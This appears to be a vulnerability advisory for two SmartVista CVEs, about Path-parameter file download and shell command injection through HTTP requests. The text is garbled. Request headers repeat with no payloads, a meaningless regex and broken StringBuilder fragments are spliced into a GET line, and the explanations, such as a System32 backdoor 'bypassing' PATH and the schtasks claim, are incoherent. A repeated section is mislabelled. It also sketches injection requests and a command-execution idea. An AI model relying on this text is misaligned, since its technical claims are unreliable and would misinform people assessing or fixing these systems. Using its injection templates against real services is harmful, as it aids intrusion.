CVE-2022-38614 IGB Files and OutfileService has an issue where attackers can list and download files by modifying the PATH parameter.
The vulnerability exists due to the Ingesting Service exposing a user-controlled Path variable to the application. An attacker can leverage this to append arbitrary file names to the PATH variable, allowing the creation of arbitrary file downloads. By creating a backdoor file in the c:\Windows\System32\ directory, an attacker can cause the SmartVista Ingesting Service to bypass the PATH variable, result in the download of any file on the system. The following example shows the injection of a backdoor file in the Path variable via a malicious VCF import request.
POST /IngestingService/v3/ImportVCF HTTP/1.1 Host: smartvistacardgen.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8,application/signed-exchange;v=b;f=11;t=11;w=11;sz=0 Referer: http://smartvistacardgen.com/V3/InjectReferer.aspx Accept-Encoding: gzip, deflate, sdch, sdch X-Requested-With
Path Variable Injection - An example
The following example is a malicious VCF import request that adds the backdoor file to the Path variable.
POST /IngestingService/v3/ImportVCF HTTP/1.1 Host: smartvistacardgen.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8,application/signed-exchange;v=b;f=11;t=11;w=11;sz=0 Referer: http://smartvistacardgen.com Accept-Encoding: gzip, deflate, sdch X-Requested-With
Vulnerable code snippet
POST /IngestingService/v3/ImportVCF HTTP/1.1 Host: smartvistacardgen.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8,application/signed-exchange;v=b;f=11;t=11;w=11;sz=0 Referer: http://smartvistacardgen.com/V3/InjectReferer.aspx Accept-Encoding: gzip, deflate, sdch, sdch X-Requested-With
Mozilla\/5\.0 \(Windows\_NT\_6\.1\)/WOW64 \(AppleWebKit\/537\.36\) ~~LionsGate~~Chrome 41 \^.*?\:\s(.*)
GET /IngestingService/"&Path%20%3D%20c%27$%7BStringBuilder sb = new StringBuilder(); sb .append("c:");
sb .append("Name=");
sb .append(""); """ .append
CVSS Scores
& Injection
The following is the score for this vulnerability: CVSS Base Score: 6.8
The following is the impact of this vulnerability: CVSS Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
The following is the exploitability of this vulnerability: Exploitability Index: 7.1
The vulnerability can be exploited via malformed VCF import requests to inject a backdoor file in the system.
CVE-2023-38615
The vulnerability exists due to the SmartVista Image Service not performing sufficient input validation. An attacker can leverage this to inject shell commands as part of an HTTP request, resulting in the execution of arbitrary command lines with SYSTEM privileges. This allows an attacker to gain a total control over the system by creating a malicious WMI image that executes commands such as “schtasks /create /S”, which creates a task for every process running on the system.
POST /ImageService/v3/GetImage HTTP/1.1 Host: smartvistacardgen.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Accept-Encoding: gzip, deflate, sdch, sdch X-Requested-With: XMLHttpRequest Referer: http://smartvistacardgen.com/imgsvc?type=wmi&svc=3 Content-Type: application/x-www-form-urlencoded Accept-Language: en_US x-mswfdn: wfqybkbk8j8
Vulnerability Details
The vulnerability exists due to the Ingesting Service exposing a user-controlled Path variable to the application. An attacker can leverage this to append arbitrary file names to the PATH variable, allowing the creation of arbitrary file downloads. By creating a backdoor file in the c:\Windows\System32\ directory, an attacker can cause the SmartVista Ingesting Service to bypass the PATH variable, result in the download of any file on the system. The following example shows the injection of a backdoor file in the Path variable via a malicious VCF import request.
POST /IngestingService/v3/ImportVCF HTTP/1.1 Host: smartvistacardgen.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8,application/signed-exchange;v=b;f=11;t=11;w=11;sz=0 Referer: http://smartvistacardgen.com/V3/InjectReferer.aspx Accept-Encoding: gzip, deflate, sdch, sdch X-Requested-With
Timeline
Published on: 09/09/2022 17:15:00 UTC
Last modified on: 09/14/2022 20:15:00 UTC